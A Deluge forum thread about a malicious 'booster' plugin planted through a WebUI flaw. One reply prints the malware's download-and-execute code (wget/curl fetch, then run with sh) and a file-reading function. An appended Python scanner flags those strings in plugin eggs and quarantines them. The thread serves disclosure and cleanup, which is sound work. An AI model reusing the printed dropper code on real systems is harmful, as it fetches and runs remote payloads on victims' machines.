
[WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Sat May 13, 2017 3:53 am
by ggez
Admin Edit: Upgrade to 1.3.15 to fix this vulnerability

I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S

I am running deluge/deluge-web on Raspbian

https://drive.google.com/file/d/0B23kWK ... sp=sharing

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 7:04 am
by Cas
If your webui is open to the internet it likely is a malicious egg utilising a known security flaw.

Upgrade to 1.3.15 as it has webui security fixes.

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 7:16 am
by Cas
Also, you should report this to Debian as a serious security issue.

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 8:05 am
by Tvich

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 8:20 am
by Cas
It definitely is malicious; it is modified Execute plugin code.

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 9:02 am
by Tvich
My bad, I misunderstood, thought it was Boost.Python. Don't know why. My bad :(

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Sun May 14, 2017 4:08 pm
by ggez
Oh sh!t, didn't expect it to be this bad... Any idea what it might have downloaded? Are there any paths that I can check?

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Sun May 14, 2017 4:58 pm
by Cas
There is likely no way to know for sure.

For reference, this is a partial summary of the code added to the Execute plugin:


def looking_file(name):
    epath = os.environ.get("PATH", None)
    if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
    for p in epath.split(":"):
        testname = p + "/" + name
        if os.path.exists(testname) and os.access(testname, os.X_OK):
            return testname
    return None

def internal_download(url, to):
    if sys.version_info[0] == 3:
        import urllib.request
        urllib.request.urlretrieve(url, to)
    else:
        import urllib
        urllib.urlretrieve(url, to)
    
def yahoo(URL):
    wget = looking_file("wget")
    curl = looking_file("curl")    
    cmd = None
    if wget:
        cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
    elif curl:
        cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "
    
    tmpfile = tempfile.mkstemp()
    tmpname = tmpfile[1]
    os.fdopen(tmpfile[0]).close()
    
    if cmd:
        try:
            tcmd = cmd % (tmpname, URL)
            Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
        except:
            pass           
    else:
        try:
            if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
                internal_download(URL, tmpname)
        except Exception as err:
            return str(err)

    if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
        try:
            os.chmod(tmpname, 0555)
            Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
            time.sleep(2)
            os.remove(tmpname)
        except Exception as err:
            return str(err)
    return "OK"
    
    def get_file(self, filename):
        if os.path.exists(filename):
            fp = open(filename)
            data = fp.read()
            fp.close()
            return data
        else:
            return "FILE %s not exists" % filename

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Thu Jul 12, 2018 12:52 pm
by eb98jdb
How do you remove this malware?

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Fri Jul 13, 2018 1:40 pm
by Shryp
eb98jdb wrote: How do you remove this malware?
I am not for sure on this as I have never had the issue, but on my system plugins are saved in
/home/[USER NAME]/.config/deluge/plugins
and also
/home/[USER NAME]/.cache/Python-Eggs/

I would shut down deluge and remove them from there as a first step.
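A defender-side check that ties Cas's code summary to Shryp's removal advice, added here as an example (it is not Deluge project code and was not posted by anyone in this thread): it lists the eggs under the two plugin paths Shryp gives, reads each egg's Python sources (an .egg is a zip, as ggez notes, and the cache holds extracted copies), looks for the strings characteristic of the modified Execute plugin Cas quoted (--no-check-certificate, urlretrieve, Popen with shell=True, the chmod followed by a backgrounded sh, and the helper names looking_file/internal_download/yahoo), and moves anything flagged into a quarantine directory rather than deleting it, so the file can still be examined. The plugin paths, the *.egg-tmp naming for extracted eggs, the expected-plugin list and the two sample eggs the demo builds are assumptions or constructed for the demo; stop Deluge before moving anything, as Shryp suggests.

```python
import os
import re
import shutil
import tempfile
import zipfile

# Only the two locations named in the thread (assumption: other installs may differ).
def plugin_dirs(home):
    return [os.path.join(home, ".config", "deluge", "plugins"),
            os.path.join(home, ".cache", "Python-Eggs")]

# Strings taken from the modified Execute plugin code quoted in the thread.
INDICATORS = {
    "no_cert_check": re.compile(r"--no-check-certificate"),
    "urlretrieve": re.compile(r"urlretrieve\("),
    "shell_popen": re.compile(r"Popen\(.*shell\s*=\s*True"),
    "chmod_exec": re.compile(r"os\.chmod\(.*0o?[57]55"),
    "sh_background": re.compile(r"\bsh %s &"),
    "helper_names": re.compile(r"\b(looking_file|internal_download|yahoo)\("),
}

def _python_sources(egg_path):
    """Yield (member, text) for every .py inside a zipped egg or an extracted egg dir."""
    if zipfile.is_zipfile(egg_path):
        with zipfile.ZipFile(egg_path) as zf:
            for name in zf.namelist():
                if name.endswith(".py"):
                    yield name, zf.read(name).decode("utf-8", errors="replace")
    elif os.path.isdir(egg_path):
        for root, _dirs, files in os.walk(egg_path):
            for fn in files:
                if fn.endswith(".py"):
                    full = os.path.join(root, fn)
                    with open(full, "rb") as fp:
                        text = fp.read().decode("utf-8", errors="replace")
                    yield os.path.relpath(full, egg_path), text

def scan_egg(egg_path):
    """Return {member: [indicator names]} for members matching at least one indicator."""
    hits = {}
    for member, src in _python_sources(egg_path):
        found = [key for key, rx in INDICATORS.items() if rx.search(src)]
        if found:
            hits[member] = found
    return hits

def find_eggs(dirs):
    """List *.egg files and extracted *.egg / *.egg-tmp dirs (setuptools cache naming)."""
    eggs = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for entry in sorted(os.listdir(d)):
            full = os.path.join(d, entry)
            if entry.endswith((".egg", ".egg-tmp")) and (zipfile.is_zipfile(full) or os.path.isdir(full)):
                eggs.append(full)
    return eggs

def scan_plugin_dirs(dirs, expected=frozenset()):
    """Flag eggs that match an indicator, or whose name is not on the expected list.
    Returns a list of (egg_path, reason, hits)."""
    findings = []
    for egg in find_eggs(dirs):
        name = os.path.basename(egg).split("-")[0].lower()
        hits = scan_egg(egg)
        if hits:
            findings.append((egg, "download-and-execute indicators", hits))
        elif name not in expected:
            findings.append((egg, "plugin not in expected list", {}))
    return findings

def quarantine(egg_path, quarantine_dir):
    """Move (never delete) a flagged egg so it can still be examined later."""
    os.makedirs(quarantine_dir, exist_ok=True)
    dest = os.path.join(quarantine_dir, os.path.basename(egg_path))
    shutil.move(egg_path, dest)
    return dest

def build_sample_home(root):
    """Constructed fake home dir: one egg carrying the indicator strings, one clean egg."""
    pdir = os.path.join(root, ".config", "deluge", "plugins")
    os.makedirs(pdir)
    marker_src = ("# constructed sample: holds the indicator strings only, runs nothing\n"
                  "CMD = 'wget -t 0 -T 15 -q --no-check-certificate -O %s %s'\n"
                  "RUN = 'Popen(tcmd, shell = True)'\n")
    with zipfile.ZipFile(os.path.join(pdir, "booster-0.1-py2.7.egg"), "w") as zf:
        zf.writestr("booster/core.py", marker_src)
    with zipfile.ZipFile(os.path.join(pdir, "Label-0.2-py2.7.egg"), "w") as zf:
        zf.writestr("label/core.py", "def enable(self):\n    pass\n")

def demo():
    """Build the sample, scan, quarantine the hit, rescan; return all three results."""
    root = tempfile.mkdtemp(prefix="deluge-scan-")
    build_sample_home(root)
    dirs = plugin_dirs(root)
    known = frozenset({"label", "execute"})  # assumed list of plugins you installed yourself
    before = scan_plugin_dirs(dirs, expected=known)
    moved = [quarantine(egg, os.path.join(root, "quarantine")) for egg, _r, _h in before]
    after = scan_plugin_dirs(dirs, expected=known)
    return {"before": before, "moved": moved, "after": after}

if __name__ == "__main__":
    for egg, reason, hits in demo()["before"]:
        print(egg, reason, hits)
```

To run it against a real account, call scan_plugin_dirs(plugin_dirs(os.path.expanduser("~")), expected=...) with the plugins you know you installed; an egg that is clean by the indicator list but not on that list is still reported, which is what catches a renamed copy.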